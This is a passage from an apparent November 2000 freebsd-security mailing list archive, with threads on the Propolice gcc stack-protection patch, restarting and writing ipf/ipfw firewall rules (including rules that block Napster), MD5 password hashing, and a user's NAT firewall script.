majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18:11:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 0FDE037B479; Fri, 17 Nov 2000 18:11:10 -0800 (PST) Received: from dragon.nuxi.com (root@trang.nuxi.com [209.152.133.57]) by relay.nuxi.com (8.9.3/8.9.3) with ESMTP id SAA03298; Fri, 17 Nov 2000 18:11:09 -0800 (PST) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.11.1/8.11.1) id eAI2B8133480; Fri, 17 Nov 2000 18:11:08 -0800 (PST) (envelope-from obrien) Date: Fri, 17 Nov 2000 18:11:07 -0800 From: "David O'Brien" To: Warner Losh Cc: Kris Kennaway , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001117181107.B33370@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <20001116170042.A58481@citusc17.usc.edu> <200011162332.QAA69958@harmony.village.org> <20001116170042.A58481@citusc17.usc.edu> <200011170108.SAA70664@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011170108.SAA70664@harmony.village.org>; from imp@village.org on Thu, Nov 16, 2000 at 06:08:35PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 16, 2000 at 06:08:35PM -0700, Warner Losh wrote: > My concern would be if we put this into the 2.95.2 tree that we have. It won't go in. Period. > I'd have no problems with making this "easy" to enable. Don't forget that our world cannot be compiled by a stock FSF GCC. -- -- David (obrien@FreeBSD.org) GNU is Not Unix / Linux Is Not UniX To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18:13:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [169.237.7.38]) by hub.freebsd.org (Postfix) with ESMTP id 40DED37B479 for ; Fri, 17 Nov 2000 18:13:25 -0800 (PST) Received: from dragon.nuxi.com (root@trang.nuxi.com [209.152.133.57]) by relay.nuxi.com (8.9.3/8.9.3) with ESMTP id SAA03305; Fri, 17 Nov 2000 18:13:24 -0800 (PST) (envelope-from obrien@NUXI.com) Received: (from obrien@localhost) by dragon.nuxi.com (8.11.1/8.11.1) id eAI2DNh33494; Fri, 17 Nov 2000 18:13:23 -0800 (PST) (envelope-from obrien) Date: Fri, 17 Nov 2000 18:13:22 -0800 From: "David O'Brien" To: Trevor Johnson Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001117181322.C33370@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <46896.974343158@ideon.st.ryukoku.ac.jp> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from trevor@jpj.net on Thu, Nov 16, 2000 at 08:54:47PM -0500 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Nov 16, 2000 at 08:54:47PM -0500, Trevor Johnson wrote: > > FYI: "Propolice", GCC extension for protecting applications from > > stack-smashing attacks, for gcc-2.95.2 is now available. > > > > > > At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches > that add bounds-checking to GCC, but unfortunately the newest is for GCC > 2.7.2. You're speaking of the ports/lang/bc-gcc port w/o realizing it. -- -- David (obrien@FreeBSD.org) GNU is Not Unix / Linux Is Not UniX To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18:19:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from mendeliev.qui.uc.pt (mendeliev.qui.uc.pt [193.137.208.67]) by hub.freebsd.org (Postfix) with ESMTP id CA49F37B479 for ; Fri, 17 Nov 2000 18:19:30 -0800 (PST) Received: from mendeliev.qui.uc.pt (mendeliev.qui.uc.pt [193.137.208.67]) by mendeliev.qui.uc.pt (8.9.3/8.9.3) with ESMTP id CAA05232; Sat, 18 Nov 2000 02:19:39 GMT (envelope-from pedro@qui.uc.pt) Date: Sat, 18 Nov 2000 02:19:39 +0000 (GMT) From: Pedro Almeida To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: Restarting Firewall ruleset In-Reply-To: <00bd01c050e7$6f68f1f0$0200a8c0@n2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Assuming that you are using ipf: ipf -F a -> "Stops" the firewall (it realy flushs the rule set!) ipf -f /path-to-whateve.conf -> loads the new rule set. Pedro On Fri, 17 Nov 2000, Nuno Teixeira wrote: > Hello to all, > > Finally I configured a ppp firewall for my FreeBSD gateway. It is working > without any problems. > > My question is: how to restart firewall. I'm asking this, because I want to > make a lot of tests with it (opening / closing services, etc) and I don't > know how to restart it without rebooting the gateway machine. > > Thanks very much, > > Nuno Teixeira > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18:52:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 2FCF337B479; Fri, 17 Nov 2000 18:52:09 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAI2q8O21649; Fri, 17 Nov 2000 21:52:08 -0500 (EST) Date: Fri, 17 Nov 2000 21:52:08 -0500 (EST) From: Trevor Johnson To: "David O'Brien" Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <20001117181322.C33370@dragon.nuxi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches > > that add bounds-checking to GCC, but unfortunately the newest is for GCC > > 2.7.2. > > You're speaking of the ports/lang/bc-gcc port w/o realizing it. Do you plan to update the port to use Herman ten Brugge's patches (http://web.inter.nl.net/hcc/Haj.Ten.Brugge/), as mentioned by Jeremy Nelson? -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 18:55:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from pt-quorum.com (pt-quorum.com [209.10.167.210]) by hub.freebsd.org (Postfix) with ESMTP id C14D437B479 for ; Fri, 17 Nov 2000 18:55:24 -0800 (PST) Received: from n2 ([193.126.129.171]) by pt-quorum.com (8.9.3/8.9.3) with SMTP id CAA04221; Sat, 18 Nov 2000 02:50:10 GMT Message-ID: <003b01c0510b$6ab809b0$0200a8c0@n2> From: "Nuno Teixeira" To: "Pedro Almeida" Cc: References: Subject: Re: Restarting Firewall ruleset Date: Sat, 18 Nov 2000 02:58:15 -0000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Olá Pedro, Obrigado pela dica. [Universidade de Coimbra ?] --------------------- Hi, Pedro, Thanks. It's worked ok. [www.uc.pt] Bye, Nuno Teixeira ----- Original Message ----- From: "Pedro Almeida" To: "Nuno Teixeira" Cc: Sent: Saturday, November 18, 2000 2:19 AM Subject: Re: Restarting Firewall ruleset > > > Assuming that you are using ipf: > > ipf -F a -> "Stops" the firewall (it realy flushs the rule set!) > > ipf -f /path-to-whateve.conf -> loads the new rule set. > > Pedro > > > > > On Fri, 17 Nov 2000, Nuno Teixeira wrote: > > > Hello to all, > > > > Finally I configured a ppp firewall for my FreeBSD gateway. It is working > > without any problems. > > > > My question is: how to restart firewall. I'm asking this, because I want to > > make a lot of tests with it (opening / closing services, etc) and I don't > > know how to restart it without rebooting the gateway machine. > > > > Thanks very much, > > > > Nuno Teixeira > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 19:34:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from secure.siteways (unknown [160.79.58.5]) by hub.freebsd.org (Postfix) with ESMTP id 26D8E37B479 for ; Fri, 17 Nov 2000 19:34:38 -0800 (PST) Received: from coresyncosxlqv (unverified [209.187.200.168]) by secure.siteways (Vircom SMTPRS 4.0.179) with SMTP id ; Fri, 17 Nov 2000 21:33:10 -0500 Message-ID: <003501c05108$4093cc30$a8c8bbd1@coresyncosxlqv> From: "Jonathan M. Slivko" To: "Nate Williams" , "Buliwyf McGraw" Cc: References: <14869.55781.674921.949509@nomad.yogotech.com> Subject: Re: Napster Port Date: Fri, 17 Nov 2000 21:30:39 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Napster, the server runs on port 6699. -- Jonathan M. Slivko ----- Original Message ----- From: "Nate Williams" To: "Buliwyf McGraw" Cc: Sent: Friday, November 17, 2000 8:22 PM Subject: Re: Napster Port > > Hi to everyone! > > This is my question: > > - I want to deny all access to Napster from my subnet. I'm using ip > > filter... but i dont know what is the port that i need to block... > > Any sugestion about the right rule in my gateway??? > > This is the best I've got so far... > > # Disable Napster > /sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif} > /sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif} > /sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif} > /sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif} > /sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif} > /sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif} > /sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif} > > {where 'netif' is the network interface for the internet} > > > > Nate > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 20: 0:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.cluster.oleane.net (smtp2.cluster.oleane.net [195.25.12.17]) by hub.freebsd.org (Postfix) with ESMTP id 2C8FC37B479 for ; Fri, 17 Nov 2000 20:00:10 -0800 (PST) Received: from diabolic-cow.321.net (dyn-1-1-005.Orl.dialup.oleane.fr [195.25.26.5]) by smtp2.cluster.oleane.net with ESMTP id eAI406C38242 for ; Sat, 18 Nov 2000 05:00:07 +0100 (CET) Received: by diabolic-cow.321.net (Postfix, from userid 1000) id 893CB82; Sat, 18 Nov 2000 00:11:06 +0100 (CET) Date: Sat, 18 Nov 2000 00:11:06 +0100 From: =?iso-8859-1?Q?R=E9mi_Guyomarch?= To: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security Message-ID: <20001118001106.B21621@diabolic-cow.321.net> References: <00c801c04dc4$12a89220$0200a8c0@n2> <20001114144513.A888@grok> <001c01c04e97$c69c3c90$0200a8c0@n2> <20001114211934.B888@grok> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20001114211934.B888@grok>; from sreid@sea-to-sky.net on Tue, Nov 14, 2000 at 09:19:34PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Nov 14, 2000 at 09:19:34PM -0800, Steve Reid wrote: ... > This is what I've whipped up for my ipfilter config: > > http://sea-to-sky.net/~sreid/ipfinit > A simple little sh script that takes an interface name (fxp0 in my > case, tun0 in yours) as an argument and extracts the IP address > information from ifconfig, then performs the appropriate substitutions > on ipf.cfg and feeds the results to ipf. OpenBSD did the same thing but integrated it in the ipfilter source. Look at src/sbin/ipf/parse.c (search for 'if_addr') and src/sbin/ipf/ifaddr.[ch] in the obsd CVS tree. -- Rémi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 20:44:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 7CC0237B4C5; Fri, 17 Nov 2000 20:44:45 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAI4jtV49949; Fri, 17 Nov 2000 20:45:56 -0800 (PST) (envelope-from kris) Date: Fri, 17 Nov 2000 20:45:52 -0800 From: Kris Kennaway To: "David O'Brien" Cc: Warner Losh , Kris Kennaway , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001117204551.A45655@citusc17.usc.edu> References: <20001116170042.A58481@citusc17.usc.edu> <200011162332.QAA69958@harmony.village.org> <20001116170042.A58481@citusc17.usc.edu> <200011170108.SAA70664@harmony.village.org> <20001117181107.B33370@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="y0ulUmNC+osPPQO6" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001117181107.B33370@dragon.nuxi.com>; from obrien@FreeBSD.ORG on Fri, Nov 17, 2000 at 06:11:07PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --y0ulUmNC+osPPQO6 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Nov 17, 2000 at 06:11:07PM -0800, David O'Brien wrote: > > I'd have no problems with making this "easy" to enable. >=20 > Don't forget that our world cannot be compiled by a stock FSF GCC. It patches cleanly against the version in our tree - see the patches I posted earlier. The only problem I've seen so far is that /bin/echo won't compile with -fstack-protector because of an unresolved open() symbol in the smashed stack handler (presumably /bin/echo doesn't call open()). I left a make world -k running at home, I'll check it tonight to see what else didnt compile. Kris --y0ulUmNC+osPPQO6 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEUEARECAAYFAjoWCX8ACgkQWry0BWjoQKU0UACWJD8C44Uau4Fq+F+KodCtrEIc sgCg/cKmWHcbEpato+a1lf2AMMatE48= =sLn4 -----END PGP SIGNATURE----- --y0ulUmNC+osPPQO6-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 22:45:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 2695537B4CF for ; Fri, 17 Nov 2000 22:45:22 -0800 (PST) Received: (qmail 45459 invoked by uid 1000); 18 Nov 2000 06:45:20 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 18 Nov 2000 06:45:20 -0000 Date: Sat, 18 Nov 2000 00:45:20 -0600 (CST) From: Mike Silbersack To: David O'Brien Cc: Warner Losh , Kris Kennaway , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <20001117181107.B33370@dragon.nuxi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 17 Nov 2000, David O'Brien wrote: > On Thu, Nov 16, 2000 at 06:08:35PM -0700, Warner Losh wrote: > > My concern would be if we put this into the 2.95.2 tree that we have. > > It won't go in. Period. Perhaps if it works well , the patch can be put into contrib, and there can be a single switch to throw that will cause the patch to be applied during buildworld, resulting in everything being compiled with the stack protection as well. (Assuming the world is compiled with the just-compiled compiler, I'm not too familiar with the innards of the build process.) Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 18 8:19:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from joe.halenet.com.au (joe.halenet.com.au [203.37.141.114]) by hub.freebsd.org (Postfix) with ESMTP id 4E35B37B4C5; Sat, 18 Nov 2000 08:19:40 -0800 (PST) Received: from temp19 (modem-112-st.halenet.com.au [203.55.33.112]) by joe.halenet.com.au (8.9.1/8.9.1) with SMTP id BAA03268; Sun, 19 Nov 2000 01:16:10 +1000 (EST) (envelope-from timbo@halenet.com.au) Message-ID: <04b101c0517b$c068e120$6500a8c0@halenet.com.au> From: "Tim McCullagh" To: , Subject: De installing DES Date: Sun, 19 Nov 2000 02:22:28 +1000 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Can anyone tell me how I would go about deinstalling DES. I am trying to use md5 and I have changed the links under /usr/lib/libcrypt* etc and I have added passwd_format=md5 to the login.conf to no avail. Any suggestions would be apreciated TIA regards Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 18 10: 4:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from ipass.one.net (news2.one.net [206.112.192.118]) by hub.freebsd.org (Postfix) with ESMTP id 0EE9237B4C5 for ; Sat, 18 Nov 2000 10:04:49 -0800 (PST) Received: from bigfoot.com (cvg-27-180-111.cinci.rr.com [24.27.180.111]) by ipass.one.net (8.8.7/8.8.7) with ESMTP id NAA22898 for ; Sat, 18 Nov 2000 13:08:18 -0500 Message-ID: <3A16C44B.4DEC2492@bigfoot.com> Date: Sat, 18 Nov 2000 13:02:51 -0500 From: Sam Carleton X-Mailer: Mozilla 4.75 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: help setting up a filewall Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have read through the “Setting-up a Dual-Homed Host using IPFW and NATD”, but the script is not working for me. My setup is a bit different. My connectivity is via a cable modem. * In the article, it looks like the author was setup with a static external IP address. I have a dynamic ip address. How do I allow the DHCP server (Cable Modem) broadcasts to get to my outside NIC? * In the article, the author is only allowing the inside connections to connect to known DNS servers. I run a caching DNS server on the inside so I need to have the firewall configured so that the internal DNS server can talk to any other DNS server. * In the article, it looks like the author is allowing things like HTTP and SSH to come into the firewall machine. I want those things to be passed onto another internal machine. Attached you will find my modifications to the rc.firewall script and relavent snips of rc.conf. If you have any thoughts on what I am doing wrong, please drop me an email. Thanks! ------------rc.conf------------ firewall_enable="Yes" firewall_type="Simple" firewall_script="/etc/rc.firewall" firewall_quite="No" natd_program="/sbin/natd" natd_enable="Yes" natd_interface="ep0" natd_flags="-f /etc/natd.conf" ------------rc.firewall------------ ############ # Setup system for firewall service. # $FreeBSD: src/etc/rc.firewall,v 1.30.2.4 2000/05/28 19:17:15 asmodai Exp $ # Suck in the configuration variables. if [ -r /etc/defaults/rc.conf ]; then . /etc/defaults/rc.conf source_rc_confs elif [ -r /etc/rc.conf ]; then . /etc/rc.conf fi ############ # Define the firewall type in /etc/rc.conf. Valid values are: # open - will allow anyone in # client - will try to protect just this machine # simple - will try to protect a whole network # closed - totally disables IP services except via lo0 interface # UNKNOWN - disables the loading of firewall rules. # filename - will load the rules in the given filename (full path required) # # For ``client'' and ``simple'' the entries below should be customized # appropriately. ############ # # If you don't know enough about packet filtering, we suggest that you # take time to read this book: # # Building Internet Firewalls # Brent Chapman and Elizabeth Zwicky # # O'Reilly & Associates, Inc # ISBN 1-56592-124-0 # http://www.ora.com/ # # For a more advanced treatment of Internet Security read: # # Firewalls & Internet Security # Repelling the wily hacker # William R. Cheswick, Steven M. Bellowin # # Addison-Wesley # ISBN 0-201-6337-4 # http://www.awl.com/ # if [ -n "${1}" ]; then firewall_type="${1}" fi ############ # Set quiet mode if requested # case ${firewall_quiet} in [Yy][Ee][Ss]) fwcmd="/sbin/ipfw -q" ;; *) fwcmd="/sbin/ipfw" ;; esac ############ # Flush out the list before we begin. # ${fwcmd} -f flush ############ # These rules are required for using natd. All packets are passed to # natd before they encounter your remaining rules. The firewall rules # will then be run again on each packet after translation by natd, # minus any divert rules (see natd(8)). # case ${natd_enable} in [Yy][Ee][Ss]) if [ -n "${natd_interface}" ]; then ${fwcmd} add 50 divert natd all from any to any via ${natd_interface} fi ;; esac ############ # If you just configured ipfw in the kernel as a tool to solve network # problems or you just want to disallow some particular kinds of traffic # then you will want to change the default policy to open. You can also # do this as your only action by setting the firewall_type to ``open''. # # ${fwcmd} add 65000 pass all from any to any ############ # Only in rare cases do you want to change these rules # ${fwcmd} add 100 pass all from any to any via lo0 ${fwcmd} add 200 deny all from any to 127.0.0.0/8 # If you're using 'options BRIDGE', uncomment the following line to pass ARP #${fwcmd} add 300 pass udp from 0.0.0.0 2054 to 0.0.0.0 # Prototype setups. # case ${firewall_type} in [Oo][Pp][Ee][Nn]) ${fwcmd} add 65000 pass all from any to any ;; [Cc][Ll][Ii][Ee][Nn][Tt]) ############ # This is a prototype setup that will protect your system somewhat # against people from outside your own network. ############ # set these to your network and netmask and ip net="192.0.2.0" mask="255.255.255.0" ip="192.0.2.1" # Allow any traffic to or from my own net. ${fwcmd} add pass all from ${ip} to ${net}:${mask} ${fwcmd} add pass all from ${net}:${mask} to ${ip} # Allow TCP through if setup succeeded ${fwcmd} add pass tcp from any to any established # Allow IP fragments to pass through ${fwcmd} add pass all from any to any frag # Allow setup of incoming email ${fwcmd} add pass tcp from any to ${ip} 25 setup # Allow setup of outgoing TCP connections only ${fwcmd} add pass tcp from ${ip} to any setup # Disallow setup of all other TCP connections ${fwcmd} add deny tcp from any to any setup # Allow DNS queries out in the world ${fwcmd} add pass udp from any 53 to ${ip} ${fwcmd} add pass udp from ${ip} to any 53 # Allow NTP queries out in the world ${fwcmd} add pass udp from any 123 to ${ip} ${fwcmd} add pass udp from ${ip} to any 123 # Everything else is denied by default, unless the # IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel # config file. ;; [Ss][Ii][Mm][Pp][Ll][Ee]) ############ # This is a prototype setup for a simple firewall. Configure this # machine as a named server and ntp server, and point all the machines # on the inside at this machine for those services. ############ # set these to your outside interface network and netmask and ip oif="ep0" # onet="192.0.2.0" # omask="255.255.255.240" # oip="192.0.2.1" # set these to your inside interface network and netmask and ip iif="xl1" inet="192.168.0.0" imask="255.255.255.0" iip="192.168.0.6" # Stop spoofing ${fwcmd} add deny all from ${inet}:${imask} to any in via ${oif} # ${fwcmd} add deny all from ${onet}:${omask} to any in via ${iif} # Stop RFC1918 nets on the outside interface ${fwcmd} add deny all from 10.0.0.0/8 to any via ${oif} ${fwcmd} add deny all from any to 10.0.0.0/8 out via ${oif} ${fwcmd} add deny all from 172.16.0.0/12 to any via ${oif} ${fwcmd} add deny all from any to 172.16.0.0/12 out via ${oif} ${fwcmd} add deny all from 192.168.0.0/16 to any via ${oif} ${fwcmd} add deny all from any to 192.168.0.0/16 out via ${oif} # Stop draft-manning-dsua-01.txt nets on the outside interface ${fwcmd} add deny all from 0.0.0.0/8 to any via ${oif} ${fwcmd} add deny all from any to 0.0.0.0/8 via ${oif} ${fwcmd} add deny all from 169.254.0.0/16 to any via ${oif} ${fwcmd} add deny all from any to 169.254.0.0/16 via ${oif} ${fwcmd} add deny all from 192.0.2.0/24 to any via ${oif} ${fwcmd} add deny all from any to 192.0.2.0/24 via ${oif} ${fwcmd} add deny all from 224.0.0.0/4 to any via ${oif} ${fwcmd} add deny all from any to 224.0.0.0/4 via ${oif} ${fwcmd} add deny all from 240.0.0.0/4 to any via ${oif} ${fwcmd} add deny all from any to 240.0.0.0/4 via ${oif} # Allow TCP through if setup succeeded ${fwcmd} add pass tcp from any to any established # Allow IP fragments to pass through ${fwcmd} add pass all from any to any frag # HTTP - Allow access to our web server ${fwcmd} add pass tcp from any to any 80 setup # SMTP - Allow access to sendmail for incoming e-mail ${fwcmd} add pass tcp from any to any 25 setup # FTP - Allow incoming data channel for outgoing connections, # Reject&Log all incoming control connections ${fwcmd} add pass tcp from any 20 to any 1024-65535 setup ${fwcmd} add deny tcp log tcp from any to any 21 in via ${oif} setup # SSH Login - Allow & Log all incoming ${fwcmd} add pass log tcp from any to any 22 in via ${oif} setup # IDENT - Reset incoming connections ${fwcmd} add reset tcp from any to any 113 in via ${oif} setup # Reject&Log all setup of incoming connections from the outside ${fwcmd} add deny log tcp from any to any in via ${oif} setup # Allow setup of any other TCP connection ${fwcmd} add pass tcp from any to any setup # Allow access to our DNS # ${fwcmd} add pass tcp from any to ${oif} 53 setup # ${fwcmd} add pass udp from any to ${oif} 53 # ${fwcmd} add pass udp from ${oif} 53 to any # Allow DNS queries out in the world ${fwcmd} add pass udp from any 53 to ${oif} ${fwcmd} add pass udp from ${oif} to any 53 # Allow NTP queries out in the world ${fwcmd} add pass udp from any 123 to any 123 via ${oif} ${fwcmd} add pass udp from any 123 to any via ${iif} ${fwcmd} add pass udp from any to any 123 via ${iif} # TRACEROUTE - Allow outgoing, but not incoming ${fwcmd} add pass udp from any to any 33434-33523 out via ${oif} ### ICMP RULES # ICMP packets # Allow all ICMP packets on internal interface ${fwcmd} add pass icmp from any to any via ${iif} # Allow outgoing pings, but not incoming ${fwcmd} add pass icmp from any to any icmptypes 8 out via ${oif} ${fwcmd} add pass icmp from any to any icmptypes 0 in via ${oif} # Allow Destination Unreachable, Source Quench, Time Exceeded, and Bad Head ${fwcmd} add pass icmp from any to any icmptypes 3,4,11,12 via ${oif} # Deny the rest of them ${fwcmd} add deny icmp from any to any # Everything else is denied by default, unless the # IPFIREWALL_DEFAULT_TO_ACCEPT option is set in your kernel # config file. ;; [Uu][Nn][Kk][Nn][Oo][Ww][Nn]) ;; *) if [ -r "${firewall_type}" ]; then ${fwcmd} ${firewall_flags} ${firewall_type} fi ;; esac To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Nov 18 15:55: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 7BA1737B479 for ; Sat, 18 Nov 2000 15:54:55 -0800 (PST) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 18 Nov 2000 15:53:21 -0800 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAINsmU37787; Sat, 18 Nov 2000 15:54:48 -0800 (PST) (envelope-from cjc) Date: Sat, 18 Nov 2000 15:54:47 -0800 From: "Crist J . Clark" To: Sam Carleton Cc: security@FreeBSD.ORG Subject: Re: help setting up a filewall Message-ID: <20001118155447.K9740@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <3A16C44B.4DEC2492@bigfoot.com> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="SLDf9lqlvOQaIe6s" Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0i In-Reply-To: <3A16C44B.4DEC2492@bigfoot.com>; from scarleton@bigfoot.com on Sat, Nov 18, 2000 at 01:02:51PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit [Maybe it's just me, but I think that generic "how do I set up a firewall?" questions are better suited for -questions. If you have specific ipfw questions, there is the -ipfw list too. But I can understand why people ask here.] On Sat, Nov 18, 2000 at 01:02:51PM 